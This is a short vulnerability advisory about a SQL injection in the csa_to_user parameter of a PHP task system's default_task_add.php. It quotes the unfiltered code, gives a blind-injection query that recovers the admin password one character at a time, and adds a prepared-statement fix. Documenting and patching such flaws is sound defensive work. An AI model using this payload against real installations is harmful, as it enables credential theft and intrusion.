### Brief description:

Parameter is not filtered.

### Details:

`/wss/default_task_add.php`: the `csa_to_user` parameter is not filtered and is passed directly into the SQL query.

### Proof of vulnerability:

[![cc.jpg](https://images.seebug.org/upload/201304/2119450024858be358de6fa15a2ec3a284f22860.jpg)](https://images.seebug.org/upload/201304/2119450024858be358de6fa15a2ec3a284f22860.jpg)

```php
$to_user = "-1";
if (isset($_POST['csa_to_user'])) {
    // Taken from the POST body with no filtering or escaping
    $to_user = $_POST['csa_to_user'];
}
mysql_select_db($database_tankdb, $tankdb);
// The raw value is interpolated into the SQL string
$query_touser = "SELECT * FROM tk_user WHERE tk_user_login = '$to_user'";
$touser = mysql_query($query_touser, $tankdb) or die(mysql_error());
```

This can be used to query a user's password:

```sql
SELECT * FROM `tk_user` WHERE tk_user_login = 'admin' AND substring(`tk_user_pass`,1,1)='a'
```
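A hardened form of the `tk_user` lookup, as an added example that is not part of the original report or the application's code. It assumes PDO with an in-memory SQLite table in place of the application's MySQL connection so that it runs offline; the function names `find_user_by_login` and `read_to_user`, the 64-character limit and the sample row are hypothetical.

```php
<?php
// Added example: the lookup from default_task_add.php with a bound parameter.
// PDO + in-memory SQLite stand in for the application's mysql_* / MySQL setup.

function find_user_by_login(PDO $db, string $login): array
{
    // The value is bound, so it never becomes part of the SQL text.
    $stmt = $db->prepare(
        'SELECT tk_user_login FROM tk_user WHERE tk_user_login = :login'
    );
    $stmt->execute([':login' => $login]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function read_to_user(array $post): string
{
    // Same "-1" default as the original code; arrays and oversized
    // values are rejected (64 is an assumed limit, not the project's).
    $value = $post['csa_to_user'] ?? '-1';
    if (!is_string($value) || strlen($value) > 64) {
        return '-1';
    }
    return $value;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tk_user (tk_user_login TEXT, tk_user_pass TEXT)');
$db->exec("INSERT INTO tk_user VALUES ('admin', 'a1b2c3')"); // constructed row

// Constructed POST bodies: a normal login, the condition shown in the
// report, a non-string value, and a missing field.
$samples = [
    ['csa_to_user' => 'admin'],
    ['csa_to_user' => "admin' AND substring(`tk_user_pass`,1,1)='a"],
    ['csa_to_user' => ['x']],
    [],
];
foreach ($samples as $post) {
    try {
        $rows = find_user_by_login($db, read_to_user($post));
        printf("%-50s => %d row(s)\n", json_encode($post), count($rows));
    } catch (PDOException $e) {
        // Log server-side instead of echoing the driver error to the
        // client, which die(mysql_error()) does in the original.
        error_log($e->getMessage());
    }
}
```

Only the plain `admin` login matches a row; the quoted condition from the report is compared as a literal login name and matches nothing.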